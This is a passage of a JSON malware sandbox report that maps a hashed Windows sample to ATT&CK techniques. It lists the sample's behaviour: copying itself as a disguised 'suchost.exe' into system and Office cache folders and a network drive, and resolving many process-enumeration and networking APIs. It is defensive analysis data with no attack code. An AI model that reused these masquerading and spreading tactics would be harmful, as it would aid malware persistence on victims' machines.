"informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 5, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Other Network Medium", "attck_id": "T1011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1011", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 3}, {"tactic": "Impact", "technique": "Data Destruction", "attck_id": "T1485", "attck_id_wiki": "https://attack.mitre.org/techniques/T1485", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"CopyFileA\" to copy C:\\29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe to new location %WINDIR%\\system32\\drivers\\suchost.exe (UID: 00000000-00003536)\n \"suchost.exe\" called \"CopyFileA\" to copy %WINDIR%\\system32\\drivers\\suchost.exe to new location C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe (UID: 00000000-00002084)\n \"suchost.exe\" called \"CopyFileA\" to copy %WINDIR%\\system32\\drivers\\suchost.exe to new location Z:\\ (UID: 00000000-00002084)\n \"suchost.exe\" called \"CopyFileA\" to copy %WINDIR%\\system32\\drivers\\suchost.exe to new location C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"suchost.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\83$$.Ico\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003536)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32ListFirst (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32ListNext (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32First (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32Next (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Toolhelp32ReadProcessMemory (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Thread32First (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Thread32Next (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32Next (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32FirstW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32NextW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32ListFirst (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32ListNext (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32First (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Heap32Next (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Toolhelp32ReadProcessMemory (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Thread32First (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Thread32Next (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32Next (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32FirstW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter Module32NextW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetCaps (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetUser (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPAddConnection (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPAddConnection3 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetReconnectFlags (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPCancelConnection (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetConnection (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetConnection3 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetUniversalName (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPOpenEnum (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPEnumResource (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPCloseEnum (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetResourceParent (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetResourceInformation (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPGetConnectionPerformance (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NPFormatNetworkName (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NetRemoteComputerSupports (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NetpwPathType (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NetpwPathCanonicalize (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter StrRChrA (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetProductInfo (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceA (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetOption (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WSAStringToAddressW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter UrlCanonicalizeW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter StrCmpNW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RtlConvertSidToUnicodeString (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter WSAGetOverlappedResult (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter ResolveDelayLoadedAPI (UID: 00000000-00002084)\n \"suchost.exe\" called \"GetProcAddress\" with a parameter CoGetStdMarshalEx (UID: 00000000-00002084)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00003484)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003548)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00003548)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00003548)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00003548)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003548)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 